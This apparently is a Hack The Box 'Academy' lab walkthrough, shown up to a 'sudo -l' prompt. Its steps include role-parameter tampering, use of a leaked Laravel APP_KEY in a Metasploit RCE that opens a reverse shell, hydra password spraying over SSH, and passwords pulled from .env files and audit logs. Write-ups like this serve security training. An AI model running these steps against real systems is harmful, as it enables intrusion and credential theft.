Pages

Search

HTB Academy

$ sudo nano /etc/hosts

#HTB 
10.10.10.215    academy.htb

$ nmap academy.htb -A -p- -T4

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 07:16 EDT
Nmap scan report for academy.htb (10.10.10.215)
Host is up (0.054s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.91%I=7%D=4/17%Time=607AC3BC%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.51 seconds

Open ports:

  • 22(tcp) – ssh
  • 80(tcp) – http
  • 33060(tcp) – mysql

Access to http://academy.htb

$ python ~/tools/dirsearch/dirsearch.py -u http://academy.htb

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10861

Error Log: /home/kali/tools/dirsearch/logs/errors-21-04-25_11-01-18.log

Target: http://academy.htb/

Output File: /home/kali/tools/dirsearch/reports/academy.htb/_21-04-25_11-01-19.txt

[11:01:19] Starting: 
[11:01:25] 403 -  276B  - /.ht_wsr.txt
[11:01:25] 403 -  276B  - /.htaccess.bak1
[11:01:25] 403 -  276B  - /.htaccess.orig
[11:01:25] 403 -  276B  - /.htaccess.sample
[11:01:25] 403 -  276B  - /.htaccess.save
[11:01:25] 403 -  276B  - /.htaccess_orig
[11:01:25] 403 -  276B  - /.htaccess_sc
[11:01:25] 403 -  276B  - /.htaccess_extra
[11:01:25] 403 -  276B  - /.htaccessBAK
[11:01:25] 403 -  276B  - /.htaccessOLD2
[11:01:25] 403 -  276B  - /.htaccessOLD
[11:01:25] 403 -  276B  - /.htm
[11:01:25] 403 -  276B  - /.html
[11:01:25] 403 -  276B  - /.htpasswd_test
[11:01:25] 403 -  276B  - /.htpasswds
[11:01:25] 403 -  276B  - /.httr-oauth
[11:01:28] 403 -  276B  - /.php
[11:01:38] 200 -    3KB - /admin.php
[11:01:50] 200 -    0B  - /config.php
[11:01:57] 302 -   54KB - /home.php  ->  login.php
[11:01:58] 301 -  311B  - /images  ->  http://academy.htb/images/
[11:01:58] 403 -  276B  - /images/
[11:01:58] 200 -    2KB - /index.php
[11:01:58] 200 -    2KB - /index.php/login/
[11:02:00] 200 -    3KB - /login.php
[11:02:09] 200 -    3KB - /register.php
[11:02:10] 403 -  276B  - /server-status
[11:02:10] 403 -  276B  - /server-status/

Task Completed

http://academy.htb/admin.php

http://academy.htb/register.php

After this step, we would be able to log in to this site.

Inspecting with Burb Suite the request when we register our user we can observe:

What would happen if we change this value when creating a new user?

Modify roleid parameter to 1.

uid=pep&password=pep&confirm=pep&roleid=0

Let’s test our new user:

http://academy.htb/admin.php

After log in as an admin, we can see a todo list where only a task is pending:

  • Fix issue with dev-staging-01.academy.htb

To be able to acces there we need to add dev-staging-01.academy.htb to our hosts file.

http://dev-staging-01.academy.htb/

Here we can obtain different information, as the Mysql credentials:

APP_KEY             "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG           "true"
APP_URL             "http://localhost"
LOG_CHANNEL         "stack"
DB_CONNECTION       "mysql"
DB_HOST             "127.0.0.1"
DB_PORT             "3306"
DB_DATABASE         "homestead"
DB_USERNAME         "homestead"
DB_PASSWORD         "secret"
BROADCAST_DRIVER    "log"
CACHE_DRIVER        "file"
SESSION_DRIVER      "file"

$ mysql -h 10.10.10.215 -p 33060 -u homestead

Enter password:
ERROR 2002 (HY000): Can't connect to MySQL server on '10.10.10.215' (115)

$ mysql -h 10.10.10.215 -p 3306 -u homestead

Enter password:
ERROR 2002 (HY000): Can't connect to MySQL server on '10.10.10.215' (115)

So it seems that we may need to search another way.

Taking into account the error message:

UnexpectedValueException thrown with message "The stream or file "/var/www/html/htb-academy-dev-01/storage/logs/laravel.log" could not be opened in append mode: failed to open stream: Permission denied"

The app name is a also giving us a clue:

APP_NAME "Laravel"

It is related with Laravel (Php Framework):
https://laravel.com/

  • We don’t know yet which version of this framework do we have.
  • A quick search on https://www.exploit-db.com/ gives some possible exploits.
    • There are only 2 verified, and one of them requires an API KEY that we do already have.
    • It is worth making a quick try.
msf6 > search laravel 

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/http/laravel_token_unserialize_exec  2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/laravel_token_unserialize_exec

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(unix/http/laravel_token_unserialize_exec) > options

Module options (exploit/unix/http/laravel_token_unserialize_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   APP_KEY                     no        The base64 encoded APP_KEY string from the .env file
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to target webapp
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf6 exploit(unix/http/laravel_token_unserialize_exec) > set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_KEY => dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set rhost 10.10.10.215 
rhost => 10.10.10.215
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set lhost 10.10.14.5
lhost => 10.10.14.5
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set VHOST dev-staging-01.academy.htb
VHOST => dev-staging-01.academy.htb
msf6 exploit(unix/http/laravel_token_unserialize_exec) > run

[*] Started reverse TCP handler on 10.10.14.5:4444 
[*] Command shell session 1 opened (10.10.14.5:4444 -> 10.10.10.215:49536) at 2021-04-17 12:53:07 -0400

whoami
www-data
hostname
academy
locate python
/etc/python3
/etc/python3.8
...
python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@academy:/var/www/html/htb-academy-dev-01/public$ 

Now we have a shell as www-data.

Let’s do a little bit more enumeration.

www-data@academy:/home/cry0l1t3$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@academy:/home/cry0l1t3$ ls -la
ls -la
total 32
drwxr-xr-x 4 cry0l1t3 cry0l1t3 4096 Aug 12  2020 .
drwxr-xr-x 8 root     root     4096 Aug 10  2020 ..
lrwxrwxrwx 1 root     root        9 Aug 10  2020 .bash_history -> /dev/null
-rw-r--r-- 1 cry0l1t3 cry0l1t3  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 cry0l1t3 cry0l1t3 3771 Feb 25  2020 .bashrc
drwx------ 2 cry0l1t3 cry0l1t3 4096 Aug 12  2020 .cache
drwxrwxr-x 3 cry0l1t3 cry0l1t3 4096 Aug 12  2020 .local
-rw-r--r-- 1 cry0l1t3 cry0l1t3  807 Feb 25  2020 .profile
-r--r----- 1 cry0l1t3 cry0l1t3   33 Apr 17 10:04 user.txt

www-data@academy:/$ cat /etc/passwd

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
egre55:x:1000:1000:egre55:/home/egre55:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mrb3n:x:1001:1001::/home/mrb3n:/bin/sh
cry0l1t3:x:1002:1002::/home/cry0l1t3:/bin/sh
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
21y4d:x:1003:1003::/home/21y4d:/bin/sh
ch4p:x:1004:1004::/home/ch4p:/bin/sh
g0blin:x:1005:1005::/home/g0blin:/bin/sh

www-data@academy:/home$ ls

ls
21y4d ch4p cry0l1t3 egre55 g0blin mrb3n

www-data@academy:/var/www/html/academy$ ls -la

ls -la
total 280
drwxr-xr-x 12 www-data www-data   4096 Aug 13  2020 .
drwxr-xr-x  4 root     root       4096 Aug 13  2020 ..
-rw-r--r--  1 www-data www-data    706 Aug 13  2020 .env
-rw-r--r--  1 www-data www-data    651 Feb  7  2018 .env.example
-rw-r--r--  1 www-data www-data    111 Feb  7  2018 .gitattributes
-rw-r--r--  1 www-data www-data    155 Feb  7  2018 .gitignore
drwxr-xr-x  6 www-data www-data   4096 Feb  7  2018 app
-rwxr-xr-x  1 www-data www-data   1686 Feb  7  2018 artisan
drwxr-xr-x  3 www-data www-data   4096 Feb  7  2018 bootstrap
-rw-r--r--  1 www-data www-data   1512 Feb  7  2018 composer.json
-rw-r--r--  1 www-data www-data 191621 Aug  9  2020 composer.lock
drwxr-xr-x  2 www-data www-data   4096 Feb  7  2018 config
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 database
-rw-r--r--  1 www-data www-data   1150 Feb  7  2018 package.json
-rw-r--r--  1 www-data www-data   1040 Feb  7  2018 phpunit.xml
drwxr-xr-x  4 www-data www-data   4096 Nov  9 10:13 public
-rw-r--r--  1 www-data www-data   3622 Feb  7  2018 readme.md
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 resources
drwxr-xr-x  2 www-data www-data   4096 Feb  7  2018 routes
-rw-r--r--  1 www-data www-data    563 Feb  7  2018 server.php
drwxr-xr-x  5 www-data www-data   4096 Feb  7  2018 storage
drwxr-xr-x  4 www-data www-data   4096 Feb  7  2018 tests
drwxr-xr-x 38 www-data www-data   4096 Aug  9  2020 vendor
-rw-r--r--  1 www-data www-data    549 Feb  7  2018 webpack.mix.js

www-data@academy:/var/www/html/academy$ cat .env

cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync

REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379

MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null

PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1

MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
www-data@academy:/var/www/html/academy$ 

We’ve obtained db dev user credentials.

dev:mySup3rP4s5w0rd!!

www-data@academy:/var/www/html/academy$ mysql -h 127.0.0.1 -u dev

mysql -h 127.0.0.1 -u dev
ERROR 1045 (28000): Access denied for user 'dev'@'localhost' (using password: NO)

We can't use to log in to Mysql, but we can test if the password have been reused. 

As ssh is open we can test with hydra if some of the system users have the password we have just found.

$ hydra -L users.txt -P password.txt 10.10.10.215 -t 4 ssh

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-18 06:04:05
[DATA] max 4 tasks per 1 server, overall 4 tasks, 8 login tries (l:8/p:1), ~2 tries per task
[DATA] attacking ssh://10.10.10.215:22/
[22][ssh] host: 10.10.10.215   login: cry0l1t3   password: mySup3rP4s5w0rd!!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-18 06:04:44

$ ssh cry0l1t3@10.10.10.215

The authenticity of host '10.10.10.215 (10.10.10.215)' can't be established.
ECDSA key fingerprint is SHA256:4v7BvR4VfuEwrmXljKvXmF+JjLCgP/46G78oNEHzt2c.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.215' (ECDSA) to the list of known hosts.
cry0l1t3@10.10.10.215's password: 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-52-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun 18 Apr 2021 10:37:11 AM UTC

  System load:             0.0
  Usage of /:              38.5% of 13.72GB
  Memory usage:            18%
  Swap usage:              0%
  Processes:               232
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.215
  IPv6 address for ens160: dead:beef::250:56ff:feb9:7034

89 updates can be installed immediately.
42 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Aug 12 21:58:45 2020 from 10.10.14.2

$ whoami

cry0l1t3

More enumeration now as cry0l1t3.

$ bash
cry0l1t3@academy:~$ cat user.txt

2234XXXXXXXXXXXXXXXXXXXXXXXXXXXX

cry0l1t3@academy:~$ whoami

cry0l1t3

cry0l1t3@academy:~$ id

uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
  • cry0l1t3 is member of adm group.
    • what is adm group?
**adm**: Group adm is used for system monitoring tasks. Members of this group can read many log files in /var/log, and can use xconsole. Historically, /var/log was /usr/adm (and later /var/adm), thus the name of the group.

cry0l1t3@academy:/var/log$ ls -la

total 2380
drwxrwxr-x  12 root      syslog            4096 Apr 18 14:50 .
drwxr-xr-x  14 root      root              4096 Aug  7  2020 ..
-rw-r--r--   1 root      root                 0 Nov  6 09:52 alternatives.log
-rw-r--r--   1 root      root              1103 Nov  5 12:55 alternatives.log.1
-rw-r--r--   1 root      root               366 Sep 14  2020 alternatives.log.2.gz
-rw-r--r--   1 root      root              2472 Aug  7  2020 alternatives.log.3.gz
drwxr-x---   2 root      adm               4096 Apr 18 14:50 apache2
drwxr-xr-x   2 root      root              4096 Apr 18 14:50 apt
drwxr-x---   2 root      adm               4096 Nov  9 10:11 audit
-rw-r-----   1 syslog    adm               4479 Apr 18 15:27 auth.log
-rw-r-----   1 syslog    adm               2376 Apr 18 14:50 auth.log.1
-rw-r-----   1 syslog    adm               1389 Feb  9 14:19 auth.log.2.gz
-rw-r-----   1 syslog    adm                564 Nov  5 11:37 auth.log.3.gz
-rw-r-----   1 syslog    adm              11423 Oct 21 09:46 auth.log.4.gz
-rw-r--r--   1 root      root            104003 Apr 23  2020 bootstrap.log
-rw-rw----   1 root      utmp                 0 Apr 18 14:50 btmp
-rw-rw----   1 root      utmp                 0 Feb  9 14:19 btmp.1
-rw-r--r--   1 syslog    adm             149110 Aug  7  2020 cloud-init.log
-rw-r--r--   1 root      root              7227 Aug  7  2020 cloud-init-output.log
drwxr-xr-x   2 root      root              4096 Apr  8  2020 dist-upgrade
-rw-r--r--   1 root      adm             105312 Apr 18 14:50 dmesg
-rw-r--r--   1 root      adm              98773 Feb  9 14:20 dmesg.0
-rw-r--r--   1 root      adm              20753 Nov  9 10:11 dmesg.1.gz
-rw-r--r--   1 root      adm              20664 Nov  6 09:52 dmesg.2.gz
-rw-r--r--   1 root      adm              20570 Nov  5 14:17 dmesg.3.gz
-rw-r--r--   1 root      adm              20493 Nov  5 11:37 dmesg.4.gz
-rw-r--r--   1 root      root                 0 Apr 18 14:50 dpkg.log
-rw-r--r--   1 root      root              2261 Feb  9 14:25 dpkg.log.1
-rw-r--r--   1 root      root              6837 Nov  5 12:55 dpkg.log.2.gz
-rw-r--r--   1 root      root              3615 Sep 14  2020 dpkg.log.3.gz
-rw-r--r--   1 root      root             38175 Aug 12  2020 dpkg.log.4.gz
-rw-r--r--   1 root      root             32192 Aug 10  2020 faillog
drwxr-xr-x   3 root      root              4096 Feb 10 13:11 installer
drwxr-sr-x+  3 root      systemd-journal   4096 Aug  7  2020 journal
-rw-r-----   1 syslog    adm                195 Apr 18 14:50 kern.log
-rw-r-----   1 syslog    adm             130597 Apr 18 14:50 kern.log.1
-rw-r-----   1 syslog    adm              79645 Feb  9 14:19 kern.log.2.gz
-rw-r-----   1 syslog    adm              39825 Nov  5 11:37 kern.log.3.gz
-rw-r-----   1 syslog    adm              97930 Oct 21 09:46 kern.log.4.gz
drwxr-xr-x   2 landscape landscape         4096 Aug  7  2020 landscape
-rw-rw-r--   1 root      utmp            293752 Apr 18 15:07 lastlog
drwxr-x---   2 mysql     adm               4096 Apr 18 14:50 mysql
drwx------   2 root      root              4096 Apr 23  2020 private
-rw-r-----   1 syslog    adm             165830 Apr 18 15:29 syslog
-rw-r-----   1 syslog    adm             196942 Apr 18 14:50 syslog.1
-rw-r-----   1 syslog    adm              28509 Feb  9 14:19 syslog.2.gz
-rw-r-----   1 syslog    adm              29882 Nov  9 10:11 syslog.3.gz
-rw-r-----   1 syslog    adm              77736 Nov  6 09:52 syslog.4.gz
-rw-r-----   1 syslog    adm              56682 Nov  5 11:37 syslog.5.gz
-rw-r-----   1 syslog    adm             356137 Oct 21 09:46 syslog.6.gz
-rw-r-----   1 syslog    adm             230354 Sep 14  2020 syslog.7.gz
-rw-------   1 root      root                 0 Apr 23  2020 ubuntu-advantage.log
drwxr-x---   2 root      adm               4096 Feb  9 14:19 unattended-upgrades
-rw-------   1 root      root               697 Feb  9 14:19 vmware-network.1.log
-rw-------   1 root      root               697 Nov  9 10:11 vmware-network.2.log
-rw-------   1 root      root               697 Nov  6 09:52 vmware-network.3.log
-rw-------   1 root      root               717 Nov  5 14:19 vmware-network.4.log
-rw-------   1 root      root               697 Nov  5 14:17 vmware-network.5.log
-rw-------   1 root      root               697 Nov  5 11:37 vmware-network.6.log
-rw-------   1 root      root               697 Oct 21 10:53 vmware-network.7.log
-rw-------   1 root      root               717 Oct 21 09:48 vmware-network.8.log
-rw-------   1 root      root               697 Oct 21 09:46 vmware-network.9.log
-rw-------   1 root      root               697 Apr 18 14:50 vmware-network.log
-rw-------   1 root      root              1875 Feb  9 14:25 vmware-vmsvc-root.1.log
-rw-------   1 root      root              1875 Nov  9 10:14 vmware-vmsvc-root.2.log
-rw-------   1 root      root              1875 Nov  6 09:55 vmware-vmsvc-root.3.log
-rw-------   1 root      root              4710 Apr 18 14:50 vmware-vmsvc-root.log
-rw-------   1 root      root              6418 Apr 18 14:50 vmware-vmtoolsd-root.log
-rw-rw-r--   1 root      utmp             88320 Apr 18 15:07 wtmp

There are many logs. but one of them may be interesting. The audit log.
More information can be obtained here:
https://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html

Using aureport command can be obtained the content of the tty.

cry0l1t3@academy:/var/log/audit$ aureport --tty

TTY Report
===============================================
# date time event auid term sess comm data
===============================================
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>
4. 08/12/2020 02:28:28 90 0 ? 1 sh "exit",<nl>
5. 08/12/2020 02:28:37 93 0 ? 1 sh "/bin/bash -i",<nl>
6. 08/12/2020 02:30:43 94 0 ? 1 nano <delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
7. 08/12/2020 02:32:13 95 0 ? 1 nano <down>,<up>,<up>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<backspace>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
8. 08/12/2020 02:32:55 96 0 ? 1 nano "6",<^X>,"y",<ret>
9. 08/12/2020 02:33:26 97 0 ? 1 bash "ca",<up>,<up>,<up>,<backspace>,<backspace>,"cat au",<tab>,"| grep data=",<ret>,"cat au",<tab>,"| cut -f11 -d\" \"",<ret>,<up>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<right>,<right>,"grep data= | ",<ret>,<up>," > /tmp/data.txt",<ret>,"id",<ret>,"cd /tmp",<ret>,"ls",<ret>,"nano d",<tab>,<ret>,"cat d",<tab>," | xx",<tab>,"-r -p",<ret>,"ma",<backspace>,<backspace>,<backspace>,"nano d",<tab>,<ret>,"cat dat",<tab>," | xxd -r p",<ret>,<up>,<left>,"-",<ret>,"cat /var/log/au",<tab>,"t",<tab>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,"d",<tab>,"aud",<tab>,"| grep data=",<ret>,<up>,<up>,<up>,<up>,<up>,<down>,<ret>,<up>,<up>,<up>,<ret>,<up>,<up>,<up>,<ret>,"exit",<backspace>,<backspace>,<backspace>,<backspace>,"history",<ret>,"exit",<ret>
10. 08/12/2020 02:33:26 98 0 ? 1 sh "exit",<nl>
11. 08/12/2020 02:33:30 107 0 ? 1 sh "/bin/bash -i",<nl>
12. 08/12/2020 02:33:36 108 0 ? 1 bash "istory",<ret>,"history",<ret>,"exit",<ret>
13. 08/12/2020 02:33:36 109 0 ? 1 sh "exit",<nl>
cry0l1t3@academy:/var/log/audit$ 

We can see that user mrb3n executed:

$su mrb3n
$mrb3n_Ac@d3my! (as a password)

Let’s do the same:

cry0l1t3@academy:/var/log/audit$ su mrb3n

Password:

$ bash
mrb3n@academy:/var/log/audit$ whoami

mrb3n

mrb3n@academy:/var/log/audit$ id

uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)

And even more enumeration as user mrb3n:

mrb3n@academy:~$ ls -la

total 32
drwxr-xr-x 5 mrb3n mrb3n 4096 Aug 12  2020 .
drwxr-xr-x 8 root  root  4096 Aug 10  2020 ..
lrwxrwxrwx 1 root  root     9 Aug 10  2020 .bash_history -> /dev/null
-rw-r--r-- 1 mrb3n mrb3n  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 mrb3n mrb3n 3771 Feb 25  2020 .bashrc
drwxrwxr-x 3 mrb3n mrb3n 4096 Oct 21 10:55 .cache
drwxrwxr-x 3 mrb3n mrb3n 4096 Aug 12  2020 .config
drwxrwxr-x 3 mrb3n mrb3n 4096 Aug 12  2020 .local
-rw-r--r-- 1 mrb3n mrb3n  807 Feb 25  2020 .profile
mrb3n@academy:~$ sudo -l 
[sudo] password for mrb3n: 
